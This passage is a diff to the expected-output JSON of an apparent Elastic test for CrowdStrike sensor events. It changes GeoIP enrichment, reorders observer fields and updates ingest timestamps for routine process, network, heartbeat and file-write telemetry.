"{\"FileDeletedCount\":\"0\",\"DirectoryCreatedCount\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"event_platform\":\"Mac\",\"NetworkBindCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"id\":\"ffffffff-1111-11eb-9d75-02bcf3ade03b\",\"NewExecutableWrittenCount\":\"0\",\"NetworkCloseCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"SuspectStackCount\":\"0\",\"timestamp\":\"1625677524102\",\"event_simpleName\":\"EndOfProcess\",\"RawProcessId\":\"33454\",\"ContextTimeStamp\":\"1625677523.068\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053603452626914\",\"AsepWrittenCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"NetworkCapableAsepWriteCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"TargetProcessId\":\"365053603452626914\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"name\":\"EndOfProcessMacV15\",\"aid\":\"ffffffff3c0846978560dbc0048d6555\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:24.102Z", "kind": "event", @@ -162,7 +174,13 @@ "EffectiveTransmissionClass": "3", "SuspectStackCount": 0, "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -174,18 +192,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 546, @@ -194,18 +206,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 547, @@ -224,12 +230,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffffc59c473aa7fcbbe7438082cb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffc59c473aa7fcbbe7438082cb", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:48.594Z", "ecs": { @@ -249,7 +264,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150589500Z", + "ingested": "2021-12-14T14:41:26.533749122Z", "original": "{\"event_simpleName\":\"RawBindIP6\",\"ContextTimeStamp\":\"1625677488.594\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"RemoteAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"365042236081053654\",\"RemotePort\":\"546\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"547\",\"Entitlements\":\"15\",\"name\":\"RawBindIP6MacV10\",\"id\":\"ffffffff-1111-11eb-ad8d-064c77be2fd1\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffc59c473aa7fcbbe7438082cb\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677488615\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:48.615Z", "kind": "event", @@ -309,12 +324,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff59fe460783ea45d59e417d6f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff59fe460783ea45d59e417d6f", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:04.527Z", "ecs": { @@ -333,7 +357,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150595900Z", + "ingested": "2021-12-14T14:41:26.533749560Z", "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"1620585913\",\"Timeout\":\"600\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018\",\"ProcessCount\":\"4\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"502\",\"event_platform\":\"Mac\",\"CommandLine\":\"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\\n feature_name: FEATURE_NAME,\\n variants: [FEATURE_VARIANT],\\n )\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsMacV1\",\"id\":\"ffffffff-1111-11eb-822b-06081a3f0f45\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff59fe460783ea45d59e417d6f\",\"timestamp\":\"1625677504527\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:04.527Z", "kind": "state", @@ -362,17 +386,23 @@ }, { "observer": { - "serial_number": "ffffffffe1ad47b6b5b44ae9151a6cf3", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffe1ad47b6b5b44ae9151a6cf3", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:14.783Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -387,8 +417,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150602200Z", + "ingested": "2021-12-14T14:41:26.533749981Z", "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"3090255842\",\"NetworkContainmentState\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"SensorHeartbeatMacV4\",\"ConfigIDPlatform\":\"4\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"ConfigIDBuild\":\"13701\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffe1ad47b6b5b44ae9151a6cf3\",\"ProvisionState\":\"1\",\"timestamp\":\"1625677514783\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:14.783Z", "kind": "event", @@ -455,12 +488,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff8be84591864008eb2e484920", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff8be84591864008eb2e484920", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:02.500Z", "ecs": { @@ -480,7 +522,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150608400Z", + "ingested": "2021-12-14T14:41:26.533750389Z", "original": "{\"MachOSubType\":\"1\",\"ParentProcessId\":\"362213307092004097\",\"SourceProcessId\":\"362213307092004097\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"362213307092004097\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Mac\",\"ProcessEndTime\":\"\",\"SVUID\":\"0\",\"ParentBaseFileName\":\"launchd\",\"id\":\"ffffffff-1111-11eb-a9ce-02e9216bdbcb\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677502500\",\"ProcessGroupId\":\"362213307092004097\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"56254\",\"GID\":\"0\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"0\",\"MD5HashData\":\"88922d50263b059696c2af5a99906562\",\"SHA256HashData\":\"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"CommandLine\":\"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000\",\"TargetProcessId\":\"363276350115996101\",\"ImageFileName\":\"/usr/libexec/xpcproxy\",\"RGID\":\"0\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2MacV5\",\"RUID\":\"0\",\"ProcessStartTime\":\"1625677502.233\",\"aid\":\"ffffffff8be84591864008eb2e484920\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:02.500Z", "kind": "event", @@ -524,8 +566,20 @@ "type": "linux" }, "destination": { - "port": 53, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 53, "ip": "67.43.156.14" }, "source": { @@ -546,12 +600,21 @@ "direction": "inbound" }, "observer": { - "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:04.982Z", "ecs": { @@ -571,7 +634,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150614800Z", + "ingested": "2021-12-14T14:41:26.533750773Z", "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkReceiveAcceptIP4\",\"ContextTimeStamp\":\"1625677504.982\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307488247882\",\"RemotePort\":\"53\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"39920\",\"Entitlements\":\"15\",\"name\":\"NetworkReceiveAcceptIP4LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"1\",\"InContext\":\"0\",\"timestamp\":\"1625677505511\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:05.511Z", "kind": "event", @@ -610,8 +673,20 @@ "ip": "0.0.0.0" }, "source": { - "port": 53, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 53, "ip": "67.43.156.14" }, "url": { @@ -626,12 +701,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff01fc49949cf06bf0bce3c010", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff01fc49949cf06bf0bce3c010", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:21.866Z", "ecs": { @@ -651,7 +735,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150621Z", + "ingested": "2021-12-14T14:41:26.533751475Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"RawBindIP4\",\"ContextTimeStamp\":\"1625677521.866\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"362579458925546303\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"53\",\"Entitlements\":\"15\",\"name\":\"RawBindIP4MacV10\",\"id\":\"ffffffff-1111-11eb-81d4-0282ad9ac82d\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01fc49949cf06bf0bce3c010\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677522009\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:22.009Z", "kind": "event", @@ -705,12 +789,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffff083845f68a7de3d95cb34361", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff083845f68a7de3d95cb34361", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:23.901Z", "ecs": { @@ -732,7 +825,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150627200Z", + "ingested": "2021-12-14T14:41:26.533751939Z", "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677523.901\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP4\":\"127.0.0.1\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364783686797112486\",\"RemotePort\":\"50626\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6MacV10\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677524048\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:24.048Z", "kind": "event", @@ -794,12 +887,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffcf45409f87ed463b40c368ec", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0010912.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffcf45409f87ed463b40c368ec", + "type": "agent", + "version": "1007.8.0010912.1" }, "@timestamp": "2021-07-07T17:05:35.482Z", "ecs": { @@ -819,7 +921,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150633400Z", + "ingested": "2021-12-14T14:41:26.533752376Z", "original": "{\"ParentProcessId\":\"38911774195823\",\"SourceProcessId\":\"38911774195823\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"38911772846634\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"event_platform\":\"Lin\",\"ProcessEndTime\":\"1625677535.102\",\"SVUID\":\"114\",\"ParentBaseFileName\":\"bash\",\"id\":\"ffffffff-1111-11eb-bad4-02690d039c6b\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677535482\",\"ProcessGroupId\":\"9277112078\",\"event_simpleName\":\"ProcessRollup2\",\"RawProcessId\":\"73249\",\"GID\":\"119\",\"ConfigStateHash\":\"1284133626\",\"SVGID\":\"119\",\"MD5HashData\":\"29037cef466fa57f03bd1b2a092c47a4\",\"SHA256HashData\":\"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112\",\"ConfigBuild\":\"1007.8.0010912.1\",\"UID\":\"114\",\"CommandLine\":\"pgbackrest --stanza\\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG\",\"TargetProcessId\":\"38911778380590\",\"ImageFileName\":\"/usr/bin/pgbackrest\",\"RGID\":\"119\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2LinV6\",\"RUID\":\"114\",\"ProcessStartTime\":\"1625677535.068\",\"aid\":\"ffffffffcf45409f87ed463b40c368ec\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:35.482Z", "kind": "event", @@ -883,12 +985,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff5a2e420c99f6b6d3a5d9de9b", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:03.713Z", "ecs": { @@ -908,7 +1019,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150639700Z", + "ingested": "2021-12-14T14:41:26.533752766Z", "original": "{\"event_simpleName\":\"NetworkConnectIP6\",\"ContextTimeStamp\":\"1625677503.713\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"17307455014463\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"41952\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP6LinV5\",\"id\":\"ffffffff-1111-11eb-9d7c-02e8a46f51a5\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff5a2e420c99f6b6d3a5d9de9b\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677503947\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:03.947Z", "kind": "event", @@ -950,12 +1061,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff20bd481a98a3d1f6191047ff", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff20bd481a98a3d1f6191047ff", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:20.973Z", "file": { @@ -980,7 +1100,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150646300Z", + "ingested": "2021-12-14T14:41:26.533753319Z", "original": "{\"event_simpleName\":\"OoxmlFileWritten\",\"ContextTimeStamp\":\"1625677520.973\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365044948432500700\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"0500000100000000000000000000000021b0260000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OoxmlFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8ad1-02cfdadef55f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff20bd481a98a3d1f6191047ff\",\"timestamp\":\"1625677521081\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508\"}", "created": "2021-07-07T17:05:21.081Z", "kind": "event", @@ -1010,13 +1130,37 @@ "type": "linux" }, "destination": { - "port": 80, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 80, "ip": "67.43.156.14" }, "source": { - "port": 59926, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 59926, "ip": "67.43.156.14" }, "url": { @@ -1032,12 +1176,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffffbd064538b214ab0dce8e82c3", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffbd064538b214ab0dce8e82c3", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:30.308Z", "ecs": { @@ -1057,7 +1210,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150652600Z", + "ingested": "2021-12-14T14:41:26.533753739Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677530.308\",\"ConfigStateHash\":\"3469235958\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12227094573885\",\"RemotePort\":\"80\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59926\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4LinV5\",\"id\":\"ffffffff-1111-11eb-b727-028bbe41f38d\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffffbd064538b214ab0dce8e82c3\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677530841\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.841Z", "kind": "event", @@ -1084,17 +1237,23 @@ }, { "observer": { - "serial_number": "ffffffff25b14d4aa96de99e24bad2fa", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff25b14d4aa96de99e24bad2fa", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:04:53.974Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, @@ -1109,9 +1268,12 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-12-09T13:36:11.150658800Z", + "ingested": "2021-12-14T14:41:26.533754197Z", "original": "{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1156120155\",\"ChannelDiffStatus\":\"1\",\"aip\":\"67.43.156.14\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"12\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV2\",\"id\":\"ffffffff-1111-11eb-b7e0-02332cdcc16d\",\"ErrorCode\":\"0\",\"aid\":\"ffffffff25b14d4aa96de99e24bad2fa\",\"timestamp\":\"1625677493974\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b7e0-02332cdcc16d", "created": "2021-07-07T17:04:53.974Z" @@ -1134,44 +1296,27 @@ ] }, { - "os": { - "type": "linux" - }, - "source": { + "observer": { "geo": { - "continent_name": "Europe", - "country_name": "Denmark", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 10.0, - "lat": 56.0 + "lon": 90.5, + "lat": 27.5 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "BT" }, - "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "mac": "6e-9e-e0-1f-6d-7d", - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffc9114c1898e79604708955a6", "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffc9114c1898e79604708955a6", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:21.218Z", + "os": { + "type": "linux" + }, "ecs": { "version": "1.12.0" }, @@ -1188,8 +1333,22 @@ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, + "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Norway", + "location": { + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "mac": "6e-9e-e0-1f-6d-7d", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, "event": { - "ingested": "2021-12-09T13:36:11.150665100Z", + "ingested": "2021-12-14T14:41:26.533754600Z", "original": "{\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677520.686\",\"aip\":\"67.43.156.14\",\"PhysicalAddress\":\"6e-9e-e0-1f-6d-7d\",\"InterfaceAlias\":\"vethdeb0243\",\"InterfaceIndex\":\"3736\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP6LinV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffffc9114c1898e79604708955a6\",\"timestamp\":\"1625677521218\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.218Z", "kind": "state", @@ -1212,21 +1371,33 @@ "PhysicalAddressLength": 6, "InterfaceAlias": "vethdeb0243", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffff2d7b4778a73b2cf58d327e42", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff2d7b4778a73b2cf58d327e42", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:40.455Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -1241,9 +1412,12 @@ "67.43.156.13" ] }, + "os": { + "type": "macos" + }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-12-09T13:36:11.150671500Z", + "ingested": "2021-12-14T14:41:26.533754995Z", "original": 